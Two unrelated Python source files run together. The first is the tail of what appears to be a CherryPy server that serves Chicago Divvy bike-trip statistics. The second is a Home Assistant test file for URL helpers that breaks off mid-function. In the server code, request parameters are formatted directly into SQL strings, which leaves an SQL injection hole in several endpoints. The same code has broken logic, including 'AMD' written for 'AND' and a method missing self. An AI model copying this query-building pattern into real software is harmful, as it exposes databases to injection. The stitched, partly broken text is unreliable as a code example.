ret.append("%s,%d" % (row[0],row[1]))
count += row[1]
#with open('/tmp/inflow', 'a') as f:
# f.write("window.inflow.set(%s, %d)\n " % (station_id, count))
return "\n".join(ret)
inflow.exposed = True
def station_popularity(self, station_name):
"""Display station popularity data for a specific station.
Args:
station_name - string - the station name.
Returns:
An int - one of 7 popularity groups.
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
try:
with open("/var/www/cs424/p2/py/popularity.pickle", "rb") as f:
pop = pickle.load(f)
except:
return "can't open file in cwd: %s" % subprocess.check_output(["pwd"])
for group in pop:
if station_name in pop[group]:
return str(group)
station_popularity.exposed = True
def get_day(self, date, gender=None,
subscriber=None,
age=None,
stations=None):
"""Get data on an individual day for playback, based on filters.
Args (all optional):
gender - string - Male or Female
subscriber - string - Subscriber or Customer
age - a string like "low,high"
station - a string like "station_id1,station_id2,station_id3"
Returns:
a csv like timestamp,trip_id,start/end,from,flat,flong,to,tlat,tlong
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
with open(os.path.join(PATH, "station_lat_long.pickle"), "rb") as f:
stat_lat_long = pickle.load(f)
where = ""
if gender or subscriber or age or stations:
where_stmts = []
if gender:
where_stmts.append("gender like '%s' " % gender)
if subscriber:
where_stmts.append("usertype like '%s%%' " % subscriber)
if age:
bottom, top = age.split(",")
where_stmts.append("age_in_2014 < %s " % top)
where_stmts.append("age_in_2014 > %s " % bottom)
if stations:
# since its bikes out, we'll only look at the depating station
stations = stations.split(",")
where_stmts.append("from_station_id in ('%s')" % \
"', '".join([str(i) for i in stations]))
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
if not where:
q = """
SELECT
starttime,
stoptime,
trip_id,
from_station_id,
to_station_id
FROM
divvy_trips_distances
WHERE
startdate like '%s'
ORDER BY
stoptime ASC""" % date
else:
q = """
SELECT
starttime,
stoptime,
trip_id,
from_station_id,
to_station_id
FROM
divvy_trips_distances
WHERE
startdate like '%s' AND %s
ORDER BY
stoptime ASC""" % (date, where)
print "assembled q = %s" % q
ret = []
ret.append("timestamp,trip_id,start/end,from,flat,flong,to,tlat,tlong")
c.execute(q)
data = OrderedDict()
keylist = {}
i = 0
for row in c.fetchall():
keylist[i] = parser.parse(row[0])
data[i] = ( # start timestamp
row[2], # trip id
"start",
stat_lat_long[row[3]][0], # from station name
stat_lat_long[row[3]][1], # from lat
stat_lat_long[row[3]][2], # from long
stat_lat_long[row[4]][0], # to station name
stat_lat_long[row[4]][1], # from lat
stat_lat_long[row[4]][2] # from long
)
i = i+1
# now we do the same thing again but for the end of the trip
keylist[i] = parser.parse(row[1])
data[i] = ( # start timestamp
row[2], # trip id
"end",
stat_lat_long[row[3]][0], # from station name
stat_lat_long[row[3]][1], # from lat
stat_lat_long[row[3]][2], # from long
stat_lat_long[row[4]][0], # to station name
stat_lat_long[row[4]][1], # from lat
stat_lat_long[row[4]][2] # from long
)
i = i+1
keys = keylist.values()
keys.sort()
for key in keys:
l = [key.strftime('%m/%d/%Y %H:%M%p')]
for j, keylookup, in keylist.items():
if key == keylookup:
l.extend(data[j])
keylist.pop(j)
break
l = tuple(l)
ret.append("%s,%s,%s,%s,%s,%s,%s,%s,%s" % l)
return "\n".join(ret)
get_day.exposed = True
def bikes_out_by_day(time_of_day=None,
gender=None,
subscriber=None,
age=None,
stations=None):
"""Display the number of rides on each day of the year. Based on filters.
Args (all optional):
gender - string - Male or Female
subscriber - string - Subscriber or Customer
age - a string like "low,high"
station - a string like "station_id1,station_id2,station_id3"
Returns:
a csv like Date,Count
"""
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
base_q = """
SELECT
startdate,
count(*)
FROM
divvy_trips_distances
"""
if time_of_day or gender or subscriber or age or stations:
where = "WHERE "
where_stmts = []
if time_of_day:
#TODO: do we need this?
pass
if gender:
where_stmts.append("gender like '%s'" % gender)
if subscriber:
where_stmts.append("usertype like '%s'" % subscriber)
if age:
bottom, top = parse_age(age)
where_stmts.append("age_in_2014 < %d" % top)
where_stmts.append("age_in_2014 > %d" % bottom)
if stations:
stations = stations.split(",")
# since its bikes out, we'll only look at the depating station
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AMD " + stmt + " "
group_by = """
GROUP BY
startdate
"""
if where_stmts:
assembled_q = " ".join((base_q, where, group_by))
else:
assembled_q = " ".join((base_q, group_by))
print assembled_q
c.execute(assembled_q)
ret = []
ret.append("Date,Count")
for row in c.fetchall():
dt = row[0]
if dt == parser.parse('2013-06-27').date:
date = 'June 27, 2013'
elif dt.day == 1:
date = "%s %s" % (dt.strftime("%b"), dt.year)
else:
date = " "
ret.append("%s,%s" % (date, row[1]))
return "\n".join(ret)
bikes_out_by_day.exposed = True
def hour_of_day(self, date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
sql = []
cache_string = ""
where = ""
if date or gender or subscriber or age or stations:
# lets do some ghetto caching
cache_string = ""
if date:
cache_string += date.replace(" ", "").replace("/", "")
if gender:
cache_string += gender
if subscriber:
cache_string += subscriber
if age:
cache_string += age
if stations: cache_string += stations
try:
with open ("%s/%s_trip_id_starttime_hours.json" % \
(os.path.join(PATH,"cache"), cache_string), "rb") as f:
return f.read()
except:
pass
try:
with open ("%s/%s_trip_id_starttime.pickle" % \
(os.path.join(PATH,"cache"), cache_string), "rb") as f:
sql = pickle.load(f)
print "running from cached version"
except:
print "running from SQL"
where = "WHERE "
where_stmts = []
if date:
where_stmts.append("startdate like '%s'" % date)
if gender:
where_stmts.append("gender like '%s'" % gender)
if subscriber:
where_stmts.append("usertype like '%s'" % subscriber)
if age:
bottom, top = parse_age(age)
where_stmts.append("age_in_2014 < %d" % top)
where_stmts.append("age_in_2014 > %d" % bottom)
if stations:
stations = stations.split(",")
# since its bikes out, we'll only look at the depating station
where_stmts.append("from_station_id in (%s)" % \
", ".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
trip_id,
starttime
FROM
divvy_trips_distances
%s
GROUP BY
trip_id
""" % where
c.execute(q)
sql = []
for row in c.fetchall():
sql.append((row[0],parser.parse(row[1])))
with open ("%s/%s_trip_id_starttime.pickle" % \
(os.path.join(PATH,"cache"), cache_string), "wb") as f:
pickle.dump(sql, f)
ret = []
ret.append("[")
d = {}
for i in range(0, 24):
count = 0
d[i] = count
for row in sql:
for i in range(0,24):
if i == row[1].hour:
d[i] += 1
for i in range(0, 24):
ret.append('{"range":"%d", "frequency":"%d"},' % (i, d[i]))
ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
ret.append("]")
with open ("%s/%s_trip_id_starttime_hours.json" % \
(os.path.join(PATH,"cache"), cache_string), "wb") as f:
f.write("\n".join(ret))
return "\n".join(ret)
hour_of_day.exposed = True
def day_of_week(self, date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
sql = []
cache_string = ""
# lets do some ghetto caching
where = ""
if date or gender or subscriber or age or stations:
# lets do some ghetto caching
if date:
cache_string += date.replace(" ", "").replace("/", "")
if gender:
cache_string += gender
if subscriber:
cache_string += subscriber
if age:
cache_string += age
if stations: cache_string += stations
try:
with open ("%s/%s_trip_id_starttime_days.json" % \
(os.path.join(PATH,"cache"), cache_string), "rb") as f:
return f.read()
except:
pass
try:
with open ("%s/%s_trip_id_starttime.pickle" % \
(os.path.join(PATH,"cache"), cache_string), "rb") as f:
sql = pickle.load(f)
print "running from cached version"
except:
print "running from SQL"
where = "WHERE "
where_stmts = []
if date:
where_stmts.append("startdate like '%s'" % date)
if gender:
where_stmts.append("gender like '%s'" % gender)
if subscriber:
where_stmts.append("usertype like '%s'" % subscriber)
if age:
bottom, top = parse_age(age)
where_stmts.append("age_in_2014 < %d" % top)
where_stmts.append("age_in_2014 > %d" % bottom)
if stations:
stationsstr = stations
stations = stations.split(",")
# since its bikes out, we'll only look at the depating station
where_stmts.append("from_station_id in (%s)" % \
", ".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AND " + stmt + " "
else:
where = ""
q = """
SELECT
trip_id,
starttime
FROM
divvy_trips_distances
%s
GROUP BY
trip_id
""" % where
c.execute(q)
sql = []
for row in c.fetchall():
sql.append((row[0],parser.parse(row[1])))
with open ("%s/%s_trip_id_starttime.pickle" % \
(os.path.join(PATH,"cache"), cache_string), "wb") as f:
pickle.dump(sql, f)
ret = []
ret.append("[")
days = OrderedDict()
days["Sun"] = 0
days["Mon"] = 0
days["Tue"] = 0
days["Wed"] = 0
days["Thu"] = 0
days["Fri"] = 0
days["Sat"] = 0
for row in sql:
days[row[1].strftime("%a")] += 1
for day, count in days.items():
ret.append('{"range":"%s", "frequency":"%d"},' % (day, count))
ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
ret.append("]")
with open ("%s/%s_trip_id_starttime_days.json" % \
(os.path.join(PATH,"cache"), cache_string), "wb") as f:
f.write("\n".join(ret))
return "\n".join(ret)
day_of_week.exposed = True
def distance_dist(self, date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
base_q = """
SELECT
meters
FROM
divvy_trips_distances
"""
where = ""
where_stmts = []
if gender or subscriber or age or stations:
where = "WHERE "
if gender:
where_stmts.append("gender like '%s'" % gender)
if subscriber:
where_stmts.append("usertype like '%s'" % subscriber)
if age:
bottom, top = parse_age(age)
where_stmts.append("age_in_2014 < %d" % top)
where_stmts.append("age_in_2014 > %d" % bottom)
if stations:
stations = stations.split(",")
# since its bikes out, we'll only look at the depating station
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AMD " + stmt + " "
group_by = """
GROUP BY
meters
"""
if where_stmts:
assembled_q = " ".join((base_q, where, group_by))
else:
assembled_q = " ".join((base_q, group_by))
c.execute(assembled_q)
ranges = [(0,0.5), (0.5,1), (1,1.5), (1.5,2), (2,2.5), (2.5,3), (3,3.5), (3.5,4), (4,4.5), (4.5,5), (5,5.5), (5.5,6), (6,6.5), (6.5,7), (7,7.5), (7.5,8), (8,8.5), (8.5,9), (9,9.5), (9.5,10), (10,10.5), (10.5,11), (11,11.5), (11.5,12), (12,12.5), (12.5,13), (13,13.5), (13.5,14), (14,14.5), (14.5,15), (15,15.5), (15.5,16), (16,16.5), (16.5,17), (17,17.5), (17.5,18), (18, 100),]
d = OrderedDict()
for item in ranges:
d[item] = 0
for row in c.fetchall():
for r in ranges:
km = float(float(row[0]) / 1000)
if km > r[0] and km <= r[1]:
d[r] += 1
ret = ["["]
for r, count in d.items():
ret.append('{ "range": "%s", "frequency": "%d" },' % ("%.1f-%.1f" % r, count))
ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
ret.append("]")
return "\n".join(ret)
distance_dist.exposed = True
def time_dist(self, date=None,
gender=None,
subscriber=None,
age=None,
stations=None):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
base_q = """
SELECT
seconds
FROM
divvy_trips_distances
"""
where = ""
where_stmts = []
if gender or subscriber or age or stations:
where = "WHERE "
if gender:
where_stmts.append("gender like '%s'" % gender)
if subscriber:
where_stmts.append("usertype like '%s'" % subscriber)
if age:
bottom, top = parse_age(age)
where_stmts.append("age_in_2014 < %d" % top)
where_stmts.append("age_in_2014 > %d" % bottom)
if stations:
stations = stations.split(",")
# since its bikes out, we'll only look at the depating station
where_stmts.append("from_station_id in ('%s')" % \
"', '".join(stations))
if where_stmts:
where = where + where_stmts[0]
for stmt in where_stmts[1:]:
where += "AMD " + stmt + " "
group_by = """
GROUP BY
seconds
"""
if where_stmts:
assembled_q = " ".join((base_q, where, group_by))
else:
assembled_q = " ".join((base_q, group_by))
c.execute(assembled_q)
ranges = [(0,5), (5,10), (10,15), (15,20), (20,25), (25,30), (30,35), (35,40), (40,45), (45,50), (50,55), (55,60), (60,65), (65,70), (70,75), (75,80), (80,85), (85,90), (90,95), (95,100), (100,105), (105,110), (110,115), (115,120), (120,125), (125,130), (130,135), (135,140), (140,145), (145,150), (150,300),]
d = OrderedDict()
for item in ranges:
d[item] = 0
for row in c.fetchall():
for r in ranges:
m = float(float(row[0]) / 60)
if m > r[0] and m <= r[1]:
d[r] += 1
ret = ["["]
for r, count in d.items():
ret.append('{ "range": "%s", "frequency": "%s" },' % ("%d-%d" % r, int(count)))
ret[len(ret)-1] = ret[len(ret)-1].rstrip(",")
ret.append("]")
return "\n".join(ret)
time_dist.exposed = True
def weather(self, date, hour):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
dt = parser.parse(date)
ret = ["icon,temp"]
with open('%s/weather/%s.pickle' % \
(PATH, "%s%02d%02d" %(dt.year, dt.month, dt.day)), 'rb') as f:
winfo = pickle.load(f)
ret.append("%s,%s" % winfo[hour])
return "\n".join(ret)
weather.exposed = True
def get_morning_trips(self, date):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
q = """
select
from_station_id,
to_station_id,
starttime
from
divvy_trips_distances
where
startdate = '%s' AND (
(starttime like '%%8:%%' and starttime not like '%%18:%%')
OR (starttime like '%%6:%%' and starttime not like '%%16:%%')
OR (starttime like '%%7:%%' and starttime not like '%%17:%%')
)
order by
starttime
""" % date
c.execute(q)
ret = ["from_station_id,to_station_id,starttime"]
i = 0
for row in c.fetchall():
ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
i += 1
print i
return "\n".join(ret)
get_morning_trips.exposed = True
def get_lunch_trips(self, date):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
q = """
select
from_station_id,
to_station_id,
starttime
from
divvy_trips_distances
where
startdate = '%s' AND (
(starttime like '%%11:%%')
OR (starttime like '%%12:%%')
)
order by
starttime
""" % date
c.execute(q)
ret = ["from_station_id,to_station_id,starttime"]
i = 0
for row in c.fetchall():
ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
i += 1
print i
return "\n".join(ret)
get_lunch_trips.exposed = True
def get_after_work_trips(self, date):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
q = """
select
from_station_id,
to_station_id,
starttime
from
divvy_trips_distances
where
startdate = '%s' AND (
(starttime like '%%16:%%')
OR (starttime like '%%17:%%')
OR (starttime like '%%18:%%')
)
order by
starttime
""" % date
c.execute(q)
ret = ["from_station_id,to_station_id,starttime"]
i = 0
for row in c.fetchall():
ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
i += 1
print i
return "\n".join(ret)
get_after_work_trips.exposed = True
def get_evening_trips(self, date):
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
q = """
select
from_station_id,
to_station_id,
starttime
from
divvy_trips_distances
where
startdate = '%s' AND (
(starttime like '%%19:%%')
OR (starttime like '%%29:%%')
)
order by
starttime
""" % date
c.execute(q)
ret = ["from_station_id,to_station_id,starttime"]
i = 0
for row in c.fetchall():
ret.append("%s,%s,%s" % (row[0], row[1], row[2]))
i += 1
print i
return "\n".join(ret)
get_evening_trips.exposed = True
application = cherrypy.Application(Root(), script_name=None, config=None)
|
|
"""Test network helper."""
from unittest.mock import Mock, patch
import pytest
from homeassistant.components import cloud
from homeassistant.config import async_process_ha_core_config
from homeassistant.core import HomeAssistant
from homeassistant.helpers.network import (
NoURLAvailableError,
_get_cloud_url,
_get_external_url,
_get_internal_url,
_get_request_host,
get_url,
is_internal_request,
)
from tests.common import mock_component
async def test_get_url_internal(hass: HomeAssistant):
"""Test getting an instance URL when the user has set an internal URL."""
assert hass.config.internal_url is None
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True)
# Test with internal URL: http://example.local:8123
await async_process_ha_core_config(
hass,
{"internal_url": "http://example.local:8123"},
)
assert hass.config.internal_url == "http://example.local:8123"
assert _get_internal_url(hass) == "http://example.local:8123"
assert _get_internal_url(hass, allow_ip=False) == "http://example.local:8123"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="example.local"
):
assert (
_get_internal_url(hass, require_current_request=True)
== "http://example.local:8123"
)
with pytest.raises(NoURLAvailableError):
_get_internal_url(
hass, require_current_request=True, require_standard_port=True
)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True, require_ssl=True)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="no_match.example.local",
), pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True)
# Test with internal URL: https://example.local:8123
await async_process_ha_core_config(
hass,
{"internal_url": "https://example.local:8123"},
)
assert hass.config.internal_url == "https://example.local:8123"
assert _get_internal_url(hass) == "https://example.local:8123"
assert _get_internal_url(hass, allow_ip=False) == "https://example.local:8123"
assert _get_internal_url(hass, require_ssl=True) == "https://example.local:8123"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
# Test with internal URL: http://example.local:80/
await async_process_ha_core_config(
hass,
{"internal_url": "http://example.local:80/"},
)
assert hass.config.internal_url == "http://example.local:80/"
assert _get_internal_url(hass) == "http://example.local"
assert _get_internal_url(hass, allow_ip=False) == "http://example.local"
assert _get_internal_url(hass, require_standard_port=True) == "http://example.local"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
# Test with internal URL: https://example.local:443
await async_process_ha_core_config(
hass,
{"internal_url": "https://example.local:443"},
)
assert hass.config.internal_url == "https://example.local:443"
assert _get_internal_url(hass) == "https://example.local"
assert _get_internal_url(hass, allow_ip=False) == "https://example.local"
assert (
_get_internal_url(hass, require_standard_port=True) == "https://example.local"
)
assert _get_internal_url(hass, require_ssl=True) == "https://example.local"
# Test with internal URL: https://192.168.0.1
await async_process_ha_core_config(
hass,
{"internal_url": "https://192.168.0.1"},
)
assert hass.config.internal_url == "https://192.168.0.1"
assert _get_internal_url(hass) == "https://192.168.0.1"
assert _get_internal_url(hass, require_standard_port=True) == "https://192.168.0.1"
assert _get_internal_url(hass, require_ssl=True) == "https://192.168.0.1"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
# Test with internal URL: http://192.168.0.1:8123
await async_process_ha_core_config(
hass,
{"internal_url": "http://192.168.0.1:8123"},
)
assert hass.config.internal_url == "http://192.168.0.1:8123"
assert _get_internal_url(hass) == "http://192.168.0.1:8123"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
):
assert (
_get_internal_url(hass, require_current_request=True)
== "http://192.168.0.1:8123"
)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_internal_url(
hass, require_current_request=True, require_standard_port=True
)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True, require_ssl=True)
async def test_get_url_internal_fallback(hass: HomeAssistant):
"""Test getting an instance URL when the user has not set an internal URL."""
assert hass.config.internal_url is None
hass.config.api = Mock(use_ssl=False, port=8123, local_ip="192.168.123.123")
assert _get_internal_url(hass) == "http://192.168.123.123:8123"
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
hass.config.api = Mock(use_ssl=False, port=80, local_ip="192.168.123.123")
assert _get_internal_url(hass) == "http://192.168.123.123"
assert (
_get_internal_url(hass, require_standard_port=True) == "http://192.168.123.123"
)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
hass.config.api = Mock(use_ssl=True, port=443)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
# Do no accept any local loopback address as fallback
hass.config.api = Mock(use_ssl=False, port=80, local_ip="127.0.0.1")
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_ssl=True)
async def test_get_url_external(hass: HomeAssistant):
"""Test getting an instance URL when the user has set an external URL."""
assert hass.config.external_url is None
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True)
# Test with external URL: http://example.com:8123
await async_process_ha_core_config(
hass,
{"external_url": "http://example.com:8123"},
)
assert hass.config.external_url == "http://example.com:8123"
assert _get_external_url(hass) == "http://example.com:8123"
assert _get_external_url(hass, allow_cloud=False) == "http://example.com:8123"
assert _get_external_url(hass, allow_ip=False) == "http://example.com:8123"
assert _get_external_url(hass, prefer_cloud=True) == "http://example.com:8123"
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_standard_port=True)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_ssl=True)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="example.com"
):
assert (
_get_external_url(hass, require_current_request=True)
== "http://example.com:8123"
)
with pytest.raises(NoURLAvailableError):
_get_external_url(
hass, require_current_request=True, require_standard_port=True
)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True, require_ssl=True)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="no_match.example.com",
), pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True)
# Test with external URL: http://example.com:80/
await async_process_ha_core_config(
hass,
{"external_url": "http://example.com:80/"},
)
assert hass.config.external_url == "http://example.com:80/"
assert _get_external_url(hass) == "http://example.com"
assert _get_external_url(hass, allow_cloud=False) == "http://example.com"
assert _get_external_url(hass, allow_ip=False) == "http://example.com"
assert _get_external_url(hass, prefer_cloud=True) == "http://example.com"
assert _get_external_url(hass, require_standard_port=True) == "http://example.com"
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_ssl=True)
# Test with external url: https://example.com:443/
await async_process_ha_core_config(
hass,
{"external_url": "https://example.com:443/"},
)
assert hass.config.external_url == "https://example.com:443/"
assert _get_external_url(hass) == "https://example.com"
assert _get_external_url(hass, allow_cloud=False) == "https://example.com"
assert _get_external_url(hass, allow_ip=False) == "https://example.com"
assert _get_external_url(hass, prefer_cloud=True) == "https://example.com"
assert _get_external_url(hass, require_ssl=False) == "https://example.com"
assert _get_external_url(hass, require_standard_port=True) == "https://example.com"
# Test with external URL: https://example.com:80
await async_process_ha_core_config(
hass,
{"external_url": "https://example.com:80"},
)
assert hass.config.external_url == "https://example.com:80"
assert _get_external_url(hass) == "https://example.com:80"
assert _get_external_url(hass, allow_cloud=False) == "https://example.com:80"
assert _get_external_url(hass, allow_ip=False) == "https://example.com:80"
assert _get_external_url(hass, prefer_cloud=True) == "https://example.com:80"
assert _get_external_url(hass, require_ssl=True) == "https://example.com:80"
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_standard_port=True)
# Test with external URL: https://192.168.0.1
await async_process_ha_core_config(
hass,
{"external_url": "https://192.168.0.1"},
)
assert hass.config.external_url == "https://192.168.0.1"
assert _get_external_url(hass) == "https://192.168.0.1"
assert _get_external_url(hass, allow_cloud=False) == "https://192.168.0.1"
assert _get_external_url(hass, prefer_cloud=True) == "https://192.168.0.1"
assert _get_external_url(hass, require_standard_port=True) == "https://192.168.0.1"
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_ssl=True)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="192.168.0.1"
):
assert (
_get_external_url(hass, require_current_request=True)
== "https://192.168.0.1"
)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True, allow_ip=False)
with pytest.raises(NoURLAvailableError):
_get_external_url(hass, require_current_request=True, require_ssl=True)
async def test_get_cloud_url(hass: HomeAssistant):
"""Test getting an instance URL when the user has set an external URL."""
assert hass.config.external_url is None
hass.config.components.add("cloud")
with patch.object(
hass.components.cloud,
"async_remote_ui_url",
return_value="https://example.nabu.casa",
):
assert _get_cloud_url(hass) == "https://example.nabu.casa"
with pytest.raises(NoURLAvailableError):
_get_cloud_url(hass, require_current_request=True)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="example.nabu.casa",
):
assert (
_get_cloud_url(hass, require_current_request=True)
== "https://example.nabu.casa"
)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="no_match.nabu.casa",
), pytest.raises(NoURLAvailableError):
_get_cloud_url(hass, require_current_request=True)
with patch.object(
hass.components.cloud,
"async_remote_ui_url",
side_effect=cloud.CloudNotAvailable,
), pytest.raises(NoURLAvailableError):
_get_cloud_url(hass)
async def test_get_external_url_cloud_fallback(hass: HomeAssistant):
"""Test getting an external instance URL with cloud fallback."""
assert hass.config.external_url is None
# Test with external URL: http://1.1.1.1:8123
await async_process_ha_core_config(
hass,
{"external_url": "http://1.1.1.1:8123"},
)
assert hass.config.external_url == "http://1.1.1.1:8123"
assert _get_external_url(hass, prefer_cloud=True) == "http://1.1.1.1:8123"
# Add Cloud to the previous test
hass.config.components.add("cloud")
with patch.object(
hass.components.cloud,
"async_remote_ui_url",
return_value="https://example.nabu.casa",
):
assert _get_external_url(hass, allow_cloud=False) == "http://1.1.1.1:8123"
assert _get_external_url(hass, allow_ip=False) == "https://example.nabu.casa"
assert _get_external_url(hass, prefer_cloud=False) == "http://1.1.1.1:8123"
assert _get_external_url(hass, prefer_cloud=True) == "https://example.nabu.casa"
assert _get_external_url(hass, require_ssl=True) == "https://example.nabu.casa"
assert (
_get_external_url(hass, require_standard_port=True)
== "https://example.nabu.casa"
)
# Test with external URL: https://example.com
await async_process_ha_core_config(
hass,
{"external_url": "https://example.com"},
)
assert hass.config.external_url == "https://example.com"
assert _get_external_url(hass, prefer_cloud=True) == "https://example.com"
# Add Cloud to the previous test
hass.config.components.add("cloud")
with patch.object(
hass.components.cloud,
"async_remote_ui_url",
return_value="https://example.nabu.casa",
):
assert _get_external_url(hass, allow_cloud=False) == "https://example.com"
assert _get_external_url(hass, allow_ip=False) == "https://example.com"
assert _get_external_url(hass, prefer_cloud=False) == "https://example.com"
assert _get_external_url(hass, prefer_cloud=True) == "https://example.nabu.casa"
assert _get_external_url(hass, require_ssl=True) == "https://example.com"
assert (
_get_external_url(hass, require_standard_port=True) == "https://example.com"
)
assert (
_get_external_url(hass, prefer_cloud=True, allow_cloud=False)
== "https://example.com"
)
async def test_get_url(hass: HomeAssistant):
"""Test getting an instance URL."""
assert hass.config.external_url is None
assert hass.config.internal_url is None
with pytest.raises(NoURLAvailableError):
get_url(hass)
hass.config.api = Mock(use_ssl=False, port=8123, local_ip="192.168.123.123")
assert get_url(hass) == "http://192.168.123.123:8123"
assert get_url(hass, prefer_external=True) == "http://192.168.123.123:8123"
with pytest.raises(NoURLAvailableError):
get_url(hass, allow_internal=False)
# Test only external
hass.config.api = None
await async_process_ha_core_config(
hass,
{"external_url": "https://example.com"},
)
assert hass.config.external_url == "https://example.com"
assert hass.config.internal_url is None
assert get_url(hass) == "https://example.com"
# Test preference or allowance
await async_process_ha_core_config(
hass,
{"internal_url": "http://example.local", "external_url": "https://example.com"},
)
assert hass.config.external_url == "https://example.com"
assert hass.config.internal_url == "http://example.local"
assert get_url(hass) == "http://example.local"
assert get_url(hass, prefer_external=True) == "https://example.com"
assert get_url(hass, allow_internal=False) == "https://example.com"
assert (
get_url(hass, prefer_external=True, allow_external=False)
== "http://example.local"
)
with pytest.raises(NoURLAvailableError):
get_url(hass, allow_external=False, require_ssl=True)
with pytest.raises(NoURLAvailableError):
get_url(hass, allow_external=False, allow_internal=False)
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="example.com"
), patch("homeassistant.components.http.current_request"):
assert get_url(hass, require_current_request=True) == "https://example.com"
assert (
get_url(hass, require_current_request=True, require_ssl=True)
== "https://example.com"
)
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, allow_external=False)
with patch(
"homeassistant.helpers.network._get_request_host", return_value="example.local"
), patch("homeassistant.components.http.current_request"):
assert get_url(hass, require_current_request=True) == "http://example.local"
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, allow_internal=False)
with pytest.raises(NoURLAvailableError):
get_url(hass, require_current_request=True, require_ssl=True)
with patch(
"homeassistant.helpers.network._get_request_host",
return_value="no_match.example.com",
), pytest.raises(NoURLAvailableError):
_get_internal_url(hass, require_current_request=True)
async def test_get_request_host(hass: HomeAssistant):
"""Test getting the host of the current web request from the request context."""
with pytest.raises(NoURLAvailableError):
_get_request_host()
with patch("homeassistant.components.http.current_request") as mock_request_context:
mock_request = Mock()
mock_request.url = "http://example.com:8123/test/request"
mock_request_context.get = Mock(return_value=mock_request)
assert _get_request_host() == "example.com"
async def test_get_current_request_url_with_known_host(
hass: HomeAssistant, current_request
